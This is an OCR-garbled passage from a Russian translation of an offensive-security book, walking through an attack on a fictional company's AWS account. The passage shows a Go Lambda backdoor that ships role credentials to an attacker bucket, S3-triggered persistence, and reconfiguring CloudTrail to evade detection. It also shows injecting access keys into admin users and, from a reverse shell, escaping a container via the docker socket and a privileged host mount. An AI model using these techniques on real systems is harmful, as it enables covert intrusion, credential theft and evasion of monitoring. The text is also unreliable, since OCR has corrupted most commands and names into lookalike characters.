настройки метрик и оповещений. В листинге 11.1 приведен пример 
события вызова ІАМ, создающего ключ доступа для пользователя-ад- 
министратора. Событие содержит информацию, необходимую любо- 
му аналитику угроз: ІР-адрес источника, личность вызывающего або- 
нента, источник события ит. д. 


Листинг 11.1. Событие СоиаТгай Сгеа%еАссеѕѕКеу 


# Ѕатр1е С1оџдТгаі1 еуепф сгеаёіпод ап айдіїіопа1 ассеѕ5 Кеу 
{ 
"еуепЕТуре": "АмѕАріСа11", 
"иѕегІйепёі+у": { 
"ассеѕѕКеуІй": "АЗТА447ВК6И$32РСУСНУ", 
"изегМате": "айтіп" 
}, 
"еүуепТіте": "2019-12-29718:42:472", 
"еуепЕЅоигсе": "іат. атагопамѕ. сот", 
"еуепЕМате": "СгеаЁеАссеѕѕКеу", 
"амѕВедіоп": "иѕ-еаѕі-1", 
"ѕоџгсеІРАййгеѕ5": "215.142.61.44", 
"изегАдепе": "ѕідпіп.атагопамѕ .сот", 
"гедиеѕРагатеіегѕ": { "иѕегМате": "айтіп" }, 
"геѕропѕеЕ1емепіѕ": { 
"ассез$Кеу": { 
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"ассеѕѕКеуІй": "АКТА447ВК6И$ВОЕХ7ТО5", 
"ѕёаіиѕ": "Асёіме", 

"изегМаме": "айтіп", 

"сгеаёерае": "Бес 29, 2019 6:42:47 РМ" 


Нужно отдать должное А\\5 за то, что регистрация событий стала 
настолько интуитивно понятной. 

МХК Ааѕ использует глобальную и всестороннюю стратегию регист- 
рации, охватывающую все регионы, как показано в листинге 11.2. 


Листинг 11.2. Конфигурация отслеживания в СоиаТгай, который 
перенаправляет логи в СіІоийИаїсћһ и 53 


гооє@РоіпЁ1:~/# аиз с1оџіЁгаі1 деѕсгібе-Ёгаі15 - - гедіоп=еџ-меѕі-1 
"Егаі14151": [{ 
"Іпс1идеС1оБа1ЅегуісеЕуепёѕ": гие, 
"Мате": "РеҒаџ1+", 
"53КеуРгеРіх": "гедіоп-а11-1095", 
"ІѕМи11ВедіопТгаі1": Ёгџе, 
© "Наѕ1пѕідһЕЅе1есёогѕ": гие, 
Ө "53ВискеЁМате": "тхгааѕ-с1оийёгаі1-а11", 
"СТоџдМаєсћіодѕГодбгоцрАгп": "агп:амѕ : 1095 :еи-меѕі-1:886371554408: 
109-9гоир: С1оџаТгаї1/1095:*", 
ыы} | 


Логи пересылаются в корзину 53 тхга@$-соци@та|-аП Ө. 

По флагу Наѕ1пѕідһЅе1есіогѕ ® мы видим, что МХВ А4$ экспери- 
ментирует с функцией С]оцаТга! под названием 1п$19Н1$, которая об- 
наруживает всплеск вызовов АРІ и помечает это как подозрительное 
событие. На данный момент она сообщает только о вызовах АРГ для 
записи, таких как АипІпѕіёапсе, СгеаёеЏѕег, СгеаёеВо1е и т. д. Мы все 
еще можем безнаказанно использовать вызовы для чтения и развед- 
ки, но как только мы начнем, например, автоматизировать создание 
учетных записей пользователей, нужно вести себя осторожно, чтобы 
не достичь динамического порога частоты вызовов, установленного 
СочаТга!й для функции ІпѕідћЁѕ. 

Эти две функции (Соц@Тга! Іпѕіећѕ и [АМ Ассеѕѕ Апа[утег) допол- 
няют другие существующие сервисы наподобие Сиагариѓу, которые 
отслеживают подозрительные события, такие как отключение функ- 
ций безопасности (СІоџаТгаі) и обмен данными с заведомо плохими 
доменами. Мы можем проверить, включен ли Сбиагариуу в данном ре- 
гионе, с помощью следующей команды: 


гооЁ@Роіпї1:~/# амѕ диагійиёу 115 -йеесёогѕ - -гедіоп=еџ-меѕ-1 
{ "Оеёесіог1й5": [ "646554е5058690с7068а65374е55770е" ] } 


Даже если МХК АЯ пренебрегла реализацией всех этих новых функ- 
ций, СочаТгай является настолько базовым компонентом, что почти 
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каждая компания включает его по умолчанию. Мы могли бы очистить 
бакет 53, в которой хранятся данные С]оцаТгай, но логи по-прежнему 
будут доступны в самом С1оцаТгай как минимум 90 дней. 

Всякий раз, когда логи таклегко доступны и полезны, осторожность 
советует нам предполагать худшее: наличие панелей мониторинга, 
отслеживающих вызовы АРІ, [Р-адреса, типы вызываемых служб, не- 
обычные запросы к службам с высоким уровнем привилегий и так 
далее. 

И вишенка на торте: Теггаѓогт. Мы знаем, что МХК А4$ использует 
Теггаѓогт для обслуживания своей инфраструктуры. Если мы вручную 
изменим неподходящий ресурс, он будет выделяться как опухший 
больной палец при следующем запуске команды *еггафогм р1ап. Даже 
электронное письмо в службу безопасности с темой «Вас взломали» 
будет иметь больше шансов остаться незамеченным. 

Таковы лишь некоторые из основных ошибок, о которых следует 
помнить при взаимодействии с учетной записью АМГ5. Это действи- 
тельно коварные мины, которые могут взорваться при малейшей 
ошибке. Они почти заставляют вас скучать по старым временам бэк- 
дора Міпаоугѕ Асїіуе Рігесїогу, когда агрегирование и анализ журна- 
лов событий с одной машины занимали два дня. 

Итак, если вы находитесь в ситуации, когда ваша цель имеет очень 
плохую безопасность, и вы чувствуете, что можете вручную создать 
пару ключей доступа, добавить несколько правдоподобных пользова- 
телей ІАМ и предоставить им права администратора, пожалуйста, ни 
в чем себе не отказывайте. В этом случае нет необходимости слишком 
усложнять стратегию бэкдора, особенно зная, что ключи доступа Јеп- 
Кіпѕ довольно стабильны. 

Однако если компания выглядит чрезмерно параноидальной - 
жесткий контроль доступа, строгие и ограниченные привилегии, 
чистый список активных пользователей и правильно настроенные 
Соц4Тгай, СІоџаМаїсћ и другие инструменты мониторинга, – вам 
может понадобиться более надежная и незаметная стратегия резерв- 
ного копирования. 

Ради собственной безопасности будем считать МХК А4$ продвину- 
той компанией и предположим худшее. Как мы можем поддерживать 
постоянный доступ, оставаясь незаметными? 


Сохранение строжайшей конспирации 


Чем мы хуже корпоративных ОеуОрз? Мы построим наш бэкдор в со- 
ответствии с самыми передовыми тенденциями, т. е. сделаем его 
полностью бессерверным и управляемым событиями. Мы настроим 
сторожевой таймер на отслеживание определенных событий и запуск 
задания, которое восстановит наш доступ при обнаружении этих со- 
бытий. 

В переводе на жаргон А\М/$ сторожевой таймер будет состоять из 
функции Гат да, запускаемой событием по нашему выбору. Мы мо- 


220 глава 11 


жем выбрать событие Соца\Ма(сВ, которое запускается каждый день, 
например, в 10:00, или балансировщик нагрузки, который получает 
предопределенный запрос. Мы выбираем событие, запускаемое, ког- 
да бакет $3 получает новые объекты. И МХЕ АЯ5, и СР используют 
один и тот же триггер, поэтому у нас больше шансов слиться с ними. 
После выполнения ГатЪ9а выгрузит учетные данные прикрепленной 
роли и отправит их в наш собственный бакет 53. Учетные данные, ко- 
торые мы получим, действительны в течение одного часа, но будут 
иметь достаточно привилегий для регулярного восстановления по- 
стоянного доступа. 


Более привлекательным подходом было бы привязать 
нашу функцию Іатђаа к событию СїіоийМаѓсћ, которое срабатывает 
всякий раз, когда меняется ключ доступа Јепкіпѕ. К сожалению, можно 
установить только одну целевую ГатБаа для каждой группы логов, и она 
сразу же отображается на панели инструментов СІоиаМаѓсћ. Преиму- 
щество подключения к 55 заключается в том, что информация скрыта 
внутри панели 53. 


Давайте еще раз окинем взглядом наш план: функция ГатЪда бу- 
дет запускаться некоторым часто происходящим внутренним собы- 
тием (в данном случае когда объект загружается в бакет 53 МХВ Ад$) 
и в ответ выполнит довольно скучный вызов риё -објесї для разме- 
щения файла, содержащего учетные данные, в удаленный бакет. [АМ 
Ассеѕѕ Апа]ухег почти ничего не заметит. 

На этапе установки Теггаѓогт не будет поднимать тревогу, так как 
большая часть ресурсов будет создана, а не изменена. Даже если исход- 
ный бакет уже учтен в статусе, технически мы добавим ресурс аи$_$3_ 
Биске _поЁі Ғісаїіоп, который является совершенно отдельной сущно- 
стью сточки зрения Теггаѓіогт. Все, что нам нужно сделать, – это выбрать 
бакет без настройки уведомлений типа ТеггаФогтеф, и все готово. 

Что касается С1ои@Тга!, единственное событие, которое он будет 
регистрировать, – это доверенный сервис 1атрӣіа. апагопамѕ . соп, ко- 
торый прикидывается законным обладателем роли для выполнения 
Гада. Это тривиальное событие, присущее любому выполнению 
ГатЫаа, останется незамеченным как Іпѕіећѕ, так и биагариуу. 

Ничто не вызывает подозрений! 


Приложение для запуска 


Переходим к этапу реализации. Приложение, которое будет запускать 
Гатбаа, представляет собой простой двоичный файл Со, который вы- 
полняет только что описанные ключевые шаги. Полный код доступен 
в архиве файлов этой книги, а здесь будут показаны лишь основные 
моменты. 

Каждая программа Со, предназначенная для работы в среде Гапа6- 
Да, начинается с одной и той же шаблонной функции таіп, которая ре- 
гистрирует точку входа Іатбаа (в данном случае это Напд1еВедиеѕ#): 
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Ғипс таіп() { 
ЛатБда. Ѕёагё(Напа1еВедиеѕ) 


} 


Далее идет классический блок кода для сборки НТТР-клиента и соз- 
дания удаленного ОКІ-адреса 53 для отправки нашего ответа: 


соп${ $ЗВУСКЕТ="мхга4$ -апа1уёісѕ" 

Ғипс Напдеведие${(сЕх сопёехі.Сопёехё, пате МуЕмепё) (ѕгіпо, еггог) { 
с1леп := &һЕёр.С1леп{} 
гезрувЕ := #Ғмё. ЅргіпЕР("ҺЕрѕ: //%5.53.атагопамѕ. сот/ѕеёир. хі", ЅЗВОСКЕТ) 


Мы выгружаем учетные данные роли Татбаа из переменных среды 
и отправляем их в наш удаленный бакет: 


ассеѕѕКеу := Ёпі.ЅргіпЕғ(` 
АМ5_АССЕ$$_КЕУ_Т0=%5 
АМ5_ЗЕСВЕТ_АССЕ$$_КЕ\У=%5 
А5 _5Е5510№ ТОКЕМ№М%5" `, 
0$ .беёепу( "А5 __АССЕЅ5 КЕҮ 10"), 
05 .беёепу( "А5 _ЅЕСКЕТ_АССЕЅ5_КЕҮ"), 
05 .беёепу( "АММ5__5Е5510№ ТОКЕМ№"), 


) 
ир\оадТо53 (53С1іепё, ЅЗВОСКЕТ, "амба", ассеѕ5Кеу) 


Метод ир1оайТ053 представляет собой простой запрос РОТ к ранее 
определенному ОКІ-адресу, поэтому его реализация достаточно оче- 
видна и здесь не приводится. 

Мы компилируем код, а затем архивируем двоичный файл: 


гооє@Роіпі1:1атБаа /# маке 
гооє@Роіп1:1атБада/# 21р Ғипсёіоп.21р Фипсоп 


Теперь займемся настройкой ГатБаа. 


Настройка ГатБаа 


Татбаа нуждается в роли с обширными разрешениями ТАМ 
и СІоџаТгаі и правом запуска исполняемых файлов, чтобы помочь 
нам поддерживать скрытый долгосрочный доступ (подробнее об этом 
позже). 

Нам нужно найти подходящих кандидатов, которых можно выдать 
за сервис Гатбаа АМ!5. Помните, что для реализации роли должны 
быть выполнены два условия: пользователь должен иметь возмож- 
ность выполнять вызовы $4$ ассерї-го1е, а роль должна допускать 
реализацию указанным пользователем. Получим перечень ролей, до- 
ступных в учетной записи А\М/$ МХК Ай: 
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гооЁ@Роіпї1:~/# амз Зам 115#-го1еѕ \ 

| 39 -г “.Ао1еѕ[] | „Во\еМмаме + “, “+ \ 
.АѕѕимеАо1еРо\ісуроситепё. 5аёетеп+[ ].Ргіпсіра1.Ѕегуісе’ \ 
| гер “ата. атахопаи$ . сом” 


дӢупато-ассеѕѕ -тдті, атрада. атмагопамѕ. сот 
сһеҒ-с1еапир-го, 1атБда.атагопамѕ. сот 
- -Сокращено- - 


Мы проверяем ІАМ-политику каждой роли, пока не найдем роль 
с нужным нам набором разрешений - в идеале, с полным доступом 
к [АМ и СрочаТгай: 


гоо@Роіпї1:~/# анѕ іам 115Е-аёёасһей-го1е-ро1ісіеѕ --го1е дупато-$$Н-мдмЕ --рго Де јепкіпѕ 


"АёёасһейРо11сіеѕ": [ 
"Ро1ісуМате" : ІАМЕШЛАссеѕѕ", 
"Ро1ісуМате": с1оџйёгаі1 -тдтё- гм", 
"Ро1ісуМате": фупато-етр- ги", 

- -5пір- - 


Роль дупато- 55ћ- тот, пожалуй, подойдет, так как она имеет поли- 
тику ІАМЕҒОЛАссеѕѕ. Весьма дерзко с нашей стороны. Если бы мы созда- 
вали свою собственную роль с нуля в учетной записи АМЅ МХК АЯ, мы 
бы не осмелились привязать к ней такую очевидную политику. Одна- 
ко, поскольку ее уже используют, мы тоже позволим себе ей восполь- 
зоваться. Кроме того, этой роли не хватает разрешений СІоџдуаїсһћ 
на запись, поэтому Гатђаа автоматически удаляет логи выполнения 
после завершения, а не передает их в СІоџаМаѓсһ. Идеально. 

Как всегда, мы пытаемся спрятаться на виду, придерживаясь су- 
ществующих соглашений об именах. Поищем существующие функ- 
ции Іатбаа в регионе ец-ие$*-1 для вдохновения: 


гооЁ@Роіпї1:~/# амѕ іам атда 115%-РипсЕ\оп$ -гедіоп=еи-меѕ-1 
"Еџпсёіопћаме" : "ѕиррогё-БЬѕ-пемѕ", 

"Еџпсёіопћаме" : "ѕиррогё-рагѕе-1095", 

"РипсТопМаме": "55р-ѕЁгеатіпд- ҒогтаЁ", 

- -Сокращено- - 


Мы остановимся на имени ѕиррогі-теёгісѕ-са1с и вызовем АРІ 
сгеаѓе- Ёипсііоп для регистрации нашей функции ГапЪАа с бэкдором: 


гоої@Роіпё1:~/# аиз ТамЬЧа сгеафе-ФипсЕоп --Рипсоп-паме ѕиррогЕ-меёгісѕ-са1с \ 
--2ір-#Ле РАБ: //Ғипсёіоп.21р \ 

--һап@ег ҒЁипсёіоп \ 

--гипёме 901.х \ 

--го1е агп:амѕ :іат: :886371554408:го1е/дупато-ѕ5һ-тдпЕ \ 

- -гедіоп еџ-меѕ&-1 
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Теперь перейдем к самому триггерному событию. 


Настройка триггерного события 


В идеале мы хотим настроить таргетинг на бакет 53, который регуляр- 
но обновляется обращениями МХК А45, но не настолько часто, чтобы 
запускать нашу ГатђБаа 1000 раз в день. 


Мы создадим ГатЬаа в том же регионе, что и МХЕ 
А@$, но мы могли бы точно так же переправить ее в неиспользуемый ре- 
гион. Эта Гатраа практически ничего не будет стоить, поэтому вряд 
ли будет заметна даже в биллинговом отчете. 


Как насчет $44 .пхгад$ . сот – бакета, в котором хранятся все реклам- 
ные материалы, которые мы рассматривали в главе 8? Быстрый вы- 
зов АРІ 115 -објесіѕ -2 показывает, что скорость обновления относи- 
тельно низкая, от 50 до 100 файлов в день: 


гоої@Роіпё1:~/# аиз 53арі 115 -објесёѕ-у2 --БисКее $44.тхгад$.сот > 115 _Кеуѕ.Ехё 
"Кеу": "2аей773247#021180345е676/82436/у14/720/баа58ес9Ғ77аса497#90с71с85ее.тр4", 
"Газ Мо4\ Ред": "2019-12-14711:01:48.0007", 

- -Сокращено- - 


гооє@Роіпі1:~/# дгер -с “2020-12-14” 11.5%_Кеуз. хе 
89 

гоо{@Ро\п1:-/# дгер -с “2020-12-13” 11.5%_Кеуз. хе 
74 

- -Сокращено- - 


Мы можем уменьшить частоту срабатывания путем выборки объ- 
ектов, запускающих событие уведомления. Мы сделаем так, чтобы 
только объекты с именем ключа, начинающимся с «2», запускали 
нашу функцию, давая нам кратность выполнения 1/16 (при условии 
что ключи равномерно распределены в шестнадцатеричном про- 
странстве). Это примерно от трех до шести вызовов в день. 

Мы явно разрешаем сервису 53 вызывать нашу функцию Гат да. 
Параметр ѕїаіетепї -1а представляет собой произвольное уникальное 
имя: 


гооЁ@Роіпё1:~/# амѕ ТамЬФа айа-регтіѕѕіоп \ 
--Ғипсёіоп-пате ѕиррогЕ-теёгісѕ-са1с \ 
--гедіоп еџ-меѕЁ-1 \ 

--ЅЕаёемеп-14 $ЗТпуоКегамЬЧа12 \ 

--асоп “ТамЬа: ТпуокеРипс оп” \ 
--ргіпсіра1 $3.атахопам$.сом \ 

--50игсе-агп агп:ам$:$3: : :$44.пхгад$.сом \ 
--зоигсе-ассоипе 886371554408 \ 

--ргоР Де јепкіпѕ 
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Затем мы настраиваем правило корзины, которое инициирует со- 
бытия только при создании объектов, начинающихся с префикса «2»: 


гооЁ@Роіпї1:~/# амз 53арі риё-Бискеї- поё і саёіоп-сопЁідигаёіоп \ 
--гедіоп еџ-меѕ-1 \ 
--Брискеё тхгайѕ -тумеБћоок \ 
--ргоғіЛе јепкіпѕ \ 
- -поЁі і саёіоп-сопҒідигаёіоп #Ле: //<(саё << ЕбЕ 
|: 
“| атрдаЕипсеіопСопҒідига+іопѕ”: [{ 
“та”: “531пуоКеіатЬда12”, 
“ГатрдаЕипс+іопАгп”: “агп: амѕ : ТамЬЧа:еи-ие$*-1:886371554408 
: Ғипс+іоп: ѕиррог-теЁгісѕ-са1с”, 
“Еуепѕ”: [“53:0ЬјесЕСгеаїей:*”], 
“РАДХег”: { 
“Кеу”: { 
“ЕАЛегАи1еѕ”: [{ 
“Маме”: “ргеҒіх”, 
«Ма\џе»: «2» 


Я 


Великолепно. У нас есть надежная стратегия сохранения, которая 
обходит как старые, так и новые функции обнаружения. 

Теперь предположим, что доступ к Јепкіпѕ каким-то образом был 
аннулирован, и мы хотели бы использовать наши учетные данные 
ГатБаа для восстановления постоянного доступа. Должны ли мы 
просто создать нового пользователя [АМ с неограниченными приви- 
легиями и сделать вид, что ничего не случилось? Не самый мудрый 
подход. Любое решение для мониторинга, основанное на СочаТгай, 
может зафиксировать этот странный запрос за считанные минуты. 

Текущая конфигурация СочаТгай, как мы видели ранее, объеди- 
няет логи из всех регионов в один регион ец-ме5*-1. Затем логи от- 
правляются в 53 и Соиа\М/аЬ, где они могут использоваться устрой- 
ствами мониторинга. Эта функция пересылки событий называется 
трейлом (гаі). 

Прежде чем вызывать какую-либо операцию ГАМ, нам нужно разо- 
рвать этот трейл. 


Заметаем следы 


Обратите внимание, что мы намерены не отключить ведение лога, 
а нарушить сам трейл. Действительно, в настоящее время невозмож- 
но полностью отключить С1оцаТга! или заставить его пропускать со- 
бытия. Что бы мы ни делали, наши вызовы АРІ по-прежнему будут 
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видны на панели мониторинга событий СочаТга! в течение следую- 
щих 90 дней. 

Однако трейл можно перенастроить, чтобы исключить пересылку 
определенных событий. Можно даже отключать целые регионы, пока 
мы вершим наши гнусные делишки. 

Отсутствие трейла означает отсутствие логов 55, СиагаБиу, 
СоцаТгай Іпѕіећѕ, метрик СІоџаМаќсһ и настраиваемых панелей мо- 
ниторинга безопасности. Точно так же, как домино, все инструменты 
мониторинга внутри и вне АМ$ рухнут один за другим в оглушитель- 
ной тишине. Мы можем добавить 100 пользователей ІАМ или запус- 
тить 1000 экземпляров в Сан-Паулу, и никто ничего не заметит, кро- 
ме, разве что, бухгалтерии. 


ЗВ Сиагариғу по-прежнему будет отслеживать и сооб- 
щать о необычном сетевом трафике, когда логи УРС включены, но ни- 
что не мешает нам поиграть с АРІ АИ. 


Вот краткий пример, показывающий, как мы можем перенастроить 
трейл, чтобы исключить глобальные (ТАМ, 5Т$ ит. д.) и мультирегио- 
нальные события: 


гоої@Роіпё1:~/# сиг1 ВЕЁрз: //тхгайѕ-герогЕ-теЁгісѕ.53-еи-меѕЁ-1. атагопамѕ .сот/ЛатЬа 


АМЅ АССЕЅ5 КЕҮ Ір=АЅІА447ВКбИЅТСТН5СІН 
АМЅ_ ЅЕСВЕТ АССЕЅЅ КЕҮ=1УМоХхЕ9ТјҒ20МпЕМЏ.. . 
АМЅ_5ЕЅ5І0№ ТОКЕМ=100732р7210Х21јЕРТ... 


# Ме 1оад {Везе ЕМУ уагіаБ1еѕ, &һеп діѕаБ1е С1оџаТгаі1 д1оБа1 апа ти1ігедіоп 10991пд 
гоої@Роіпё1:~/# амѕ с1оийёгаіл ирда+е-Егаіл \ 

--пате деФаи1* \ 

- -по-іпс1иде-д1оБа1-ѕегуісе-еуепёѕ \ 

- -п0-1$-м 1 - гедіоп \ 

- -гедіоп=еџ-меѕЕ 


"Мате": "деҒаџ1&", 

"53ВискеЕМате": "тхгайѕ -с1оџаЁгаі1 - 1095", 
"Іпс1идеС1оБа1ЅегуісеЕуепёѕ": Ға1ѕе, 
"ІЅМи11ВедіопТгаі1": Ға1ѕе, 

- -Сокращено- - 


С этого момента у нас есть карт-бланш на создание пользователей 
и ключей доступа и прочие безобразия. Кто-то, вручную просматри- 
вающий панель инструментов СІоџаТгаі, может обнаружить наши 
вызовы АРІ, если мы будем крайне неосторожны, но все автоматизи- 
рованные решения и инструменты останутся в неведении. 


Восстановление доступа 


Теперь, когда мы отключили СоцТгай, мы можем перейти к созда- 
нию более устойчивого набора учетных данных АҮ. 
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Пользователи и группы, связанные с политикой администрирова- 
ния по умолчанию, становятся легкой добычей. Пользователи [АМ 
ограничены двумя ключами доступа, поэтому мы находим пользова- 
теля с одним ключом доступа или вообще без ключа и внедряем ему 
дополнительный ключ, которым мы будем тайно владеть. Сначала 
мы получаем перечень пользователей и групп: 


гооЁ@Роіпї1:~/# амз іам 115-епііеѕ-Ғог-ро1ісу \ 
- -ро1ісу-агп агп:амѕ : іам: : амѕ : ро\ісу/АйтіпіѕЕгаёогАссеѕ5 


УзегМате: Б. дапіе1Ла 
ЏѕегМате: сһгіѕ.ҺіЁсһ 
ЏѕегМате: й. геѕ51ег 

- -Сокращено- - 


Затем мы запрашиваем список текущих ключей доступа: 


# Список ключей доступа. Если их меньше 2, можно внедрить еще один 
гооє@РоіпЁ1:~/# амѕ Там 11$%-ассез$-Кеу$ \ 

--изег Ь.дапіе\Ла \ 

| ја “.АссеѕѕКеуМеёайа+а[].АссеѕѕКеуІа” 


"АКТА447ВК6\$2Х$5004Х" 


Отлично, у пользователя Ь.дапіе\Ла только один ключ. Выбрав 
цель, мы создаем ключ доступа: 


гооє@РоіпЁ1:~/# амѕ іат сгеа%е-ассез$-Кеу --изег Ь.дапіе1Ла 
ЏѕегМате: Б.Чапле\Да, 

АссеѕѕКеуІй: АКІА447АКбИЅҮЗТМЕТЗ2, 

ЅесгеЁАссеѕѕКеу: ОСЕ1+1ІхгсЁпЁг127са0О0#тјей7и59А05и0Сх2ӣ, 


И мы снова в деле. Мы восстановили постоянные учетные данные. 

Однако мы пока не можем снова включить мультирегиональное ло- 
гирование. Нам нужно подождать не менее получаса после нашего по- 
следнего вызова АРІ. Этот период ожидания имеет решающее значе- 
ние, поскольку передача события в СІоџаТгаії может занять до 20 мин. 
Если мы повторно активируем глобальное логирование событий 
слишком рано, некоторые из наших действий могут попасть в трейл 
и, следовательно, в 53, Іпѕіећѕ, СІоџоаМаѓсћ и другие платформы. 


Альтернативные (худшие) методы 


Вы можете спросить, почему бы нам просто не использовать Гатбаа 
для автоматизации последующих действий 1АМ/СоцаТгай. Функция 
Гада может работать не более 15 мин, поэтому есть реальная ве- 
роятность, что она слишком рано включит глобальное логирование 
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событий. Мы могли бы подключить другую функцию ГатЪаа на на- 
шей стороне, чтобы избежать этого состояния гонки, но это слишком 
сложный процесс для столь тривиальной задачи. 

В качестве альтернативы мы могли бы выбрать запуск обратной 
оболочки непосредственно в среде Гапбаа, но это очень неудобно. 
Функция работает в минимальном контейнере, в котором файловая 
система монтируется как доступная только для чтения, за исключе- 
нием папки /&тр, в которой отсутствует флаг разрешения исполняе- 
мых файлов. Нам нужно будет вручную загрузить обратную оболочку 
в память как независимый процесс, чтобы он не был завершен об- 
работчиком Гат да. Но ради чего? Бесплодная высохшая почва без 
самых основных утилит, которые АМ/Ѕ уничтожит спустя 60 мин, не 
стоит наших усилий. 


Дополнительные ресурсы 


• Дополнительная информация об анализаторе доступа ТАМ: һіїрѕ;// 
ам/5.атагоп.сотЛат/еаигез/апайуте-ассез5/. 


• Дополнительная информация о Соц@ТгаЙ 1п$1$: И#р$.//атги. 
10/38ВОХЄЕ. 


• Список событий уведомлений АМ 53: й105;//ат2п.іо/2МТд910. 

• Дополнительная информация о централизации логов: ћіёрѕ Луу. 
10991у.сот/иітаїе-диіае/сепїга!і2іпд-ууіпаоууѕ-1095/. 

• Дополнительные сведения о запросе логов Міпӣоуѕ: ћіірѕ;//еүоѓес. 
хуғ/ромегѕће!!-еуегуїћһіпд-уои-уапіей-іо-Кпоу-ађоиї-еуепї-1095/. 


АПОФЕОЗ 


Пока мы возились с нашим бэкдором ГатЪаа, кто-то из 
персонала Стеіѕсһ РоЙ@со был столь любезен, чтобы за- 
пустить обратную оболочку, вложенную в скриптесг-109- 
іп. ѕћ. Да не один раз, а многократно. Большинство сес- 
сий заканчивались примерно через 30 минут, поэтому 
нам нужно быстро и эффективно оценить эту новую среду 
и найти новые способы проникновения внутрь. Мы открываем одну 
из сессий теегргеег и запускаем оболочку на удаленной машине: 


мефегргефег > ѕће11 

Сһаппе1 1 сгеа*ед. 

#14 

и1д=0 (гоо) 919=0(гоо{) дгоџрѕ=0(гооё) 


# һоѕпапме 
е56951с17Беб 


Мы ВИДИМ, ЧТО работаем как тоог Ө внутри машины со случайным 
именем Ө. Да, вероятно, мы находимся внутри контейнера. Естест- 
венно, мы запускаем команду епу, чтобы раскрыть все внедренные 
секреты, и команду почпЁ для отображения папок и файлов, совмест- 
но используемых хостом. За этими командами следует пара запросов 
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к АР! метаданных, запрашивающих роль ІАМ, привязанную к машине 
(листинг 12.1). 


Листинг 12.1. Вывод команд епу и тоуп\, за которыми следует запрос 
к АРІ метаданных 


# епу 

НОЗТМАМЕ=се{ 681151504 

СОРАТН= /до 

РИО=/90 

СОГАМС_ МЕКЅІ0№=1.13.5 

# моупе 

/іеу/таррег/ирипёи- -м9-гооЁ оп /еёс/һоѕіѕ уре ех{4 
(ги, геаїіте ,еггогѕ=гетоџпі-го ,дафа=огдегед) 


© {трЕ5 оп /маг/гип/роскег.ѕоск фуре ЁтрЁѕ 
(ги ,поѕиій, поехес, ге1аїіте , 517е=404644К ‚моде=755) 


[іеу/таррег/ибипёи- -м9-гооЁ оп /иѕг/Біп/роскег уре ехї4 
(ги, ге1аїіте ,еггогѕ=гетоџпі-го ,аёа=огіегеа) 


# ар іпѕа11 -у сиг1 
# сиг1 169.254.169.254/1аёеѕі/теЕа-да+а/іат/ѕесигі+у-сгейепёіа1ѕ/ 
Ө ...<1111е>404 - №1 Ғоџпі</&11е>... 


В результате выполнения команды епу не просматриваются ника- 
кие переменные Кибегпеѓеѕ или имена оркестраторов. Кажется, что 
мы заперты внутри автономного контейнера, лишенного паролей 
или секретов. К рассматриваемой машине Ө даже не привязана роль 
ТАМ, а просто есть небольшой /маг/гип/роскег.ѕоск Ө, смонтирован- 
ный внутри самого контейнера вместе с бинарным файлом ОоскКег. 
Очень продуманно с их стороны! 

Мы можем безнаказанно слепить на коленке уродливый код Ј$50М, 
который можно использовать для прямого запроса /маг/гип/роскег. 
ѕосК через сиг1 и быстрого выполнения команд роскКег, чтобы полу- 
чить перечень запущенных в данный момент контейнеров (см. лис- 
тинг 12.2). 


Листинг 12.2. Список контейнеров, запущенных на хосте 


# БосКег рѕ 
СОМТАІМЕВ ТО ТМАСЕ 
© е56951с176еб 983457354409 .4Кг.есг.еи-ме$з*-1.амахопам$ . сот/ 
арр-абёеѕі: 50Р6541-айй- Ғеаёџге-пемогк 


тЕбеБ2ес2565 983457354409 .Ккг.есг.еџ-меѕі-1. атагопамѕ .соп/дафауа Деу: птазег 


8сЬс10012935 983457354409 .кг.есг.еџ-меѕі-1. атагопамѕ . сот/116Ьргейісё: таѕЁег 
- -Сокращено- - 
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Мы видим, что на этой машине работает более 10 контейнеров, все 
они извлечены из реестра контейнеров Е1аѕііс 983457354409.ЧКг.есг. 
еи-ие5+-1.атахопаи$ . сот. Мы помним идентификатор учетной запи- 
си 983457354409; мы видели его авторизацию в политике бакета пх- 
гад$ - 1.Наша догадка была верна: действительно, это Стгеїѕсһ РоН@со. 

Все контейнеры, найденные влистинге 12.2, были развернуты с по- 
мощью тега маз{ег, за исключением одного: образа арр-ађБёеѕї Ө, ко- 
торый имеет любопытный тег 51Р6541-а44-Реафиге-пе{могкК. 

Мы можем догадываться о том, что происходит в этой машине, но 
нам все еще не хватает последней порции информации, прежде чем 
делать выводы. Давайте получим больше информации, используя 
команду росКкег іпҒо для отображения данных о хосте: 


# роскег іпЁо 

Мате: јепкіпѕ-51ауе-4 

Тоба Метогу: 31.859С1В 

Орегаїіпд Ѕуѕёет: ИБипфи 16.04.6 175 
Ѕегуег: 

СопЁаіпегѕ: 546 

Аоиппіпд: 12 

- -Сокращено- - 


Ну здравствуй, Јепкіпѕ, наш старый друг. Теперь все это обретает 
смысл. Мы можем предположить, что внедренная нами ранее спящая 
полезная нагрузка активируется сквозной тестовой рабочей нагруз- 
кой. Задание, запущенное на этом экземпляре, вероятно, запускает 
контейнер, который аутентифицируется в АМ5 ЕСК с помощью сце- 
нария есг-1091п. $, а затем поднимает подмножество рабочих кон- 
тейнеров, обозначенных тегом таѕіег – дафауаДеу, 11Ьргедісё ит.д.- 
вместе с экспериментальным росКег-образом тестируемого сервиса 
ар -+еѕї. Это объясняет, почему у него другой тег, чем у всех остальных 
контейнеров. 

Такой способ предоставления доступа к сокету ОоскКег часто встре- 
чается в тестовых средах, где РосКкег используется не столько из-за 
его свойств изоляции, сколько из-за его функций упаковки. Напри- 
мер, Сгапе, популярный инструмент оркестровки ОБоскКег (105;/ 
дипир.сот/т/сваеаиег/сгапе/), используется для развертывания кон- 
тейнеров вместе с их зависимостями. Вместо того чтобы устанавли- 
вать Стапе на каждой отдельной машине, компания может упаковать 
его в контейнер и развертывать во время выполнения, когда это не- 
обходимо. 

С точки зрения программного обеспечения, это здорово. Все зада- 
ния используют одну и ту же версию инструмента Стапе, и не имеет 
значения, на каком сервере выполняются тесты. Однако с точки зре- 
ния безопасности это узаконивает использование трюков Воскег-ш- 
Роскег (Сгапе запускает контейнеры из своего собственного контей- 
нера), что открывает ворота в ад и даже дальше. 
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Сохранение доступа 


Тестовые задания выполняются ровно до того момента, пока их не 
остановят. Давайте превратим этот эфемерный доступ в постоянный, 
запустив собственный теегргетег в новом контейнере, который мы 
назовем амѕ-с11: 


# Боскег гип \ 
--ргіміЛедей \ 
Ө -ү /: /һоѕ+05 \ 
-\У /маг/гип/ОосКег . 5осК: /маг/гип/роскег.ѕоск \ 
-\ /иѕг/Біп/доскег : /иѕг/Біп/роскег \ 
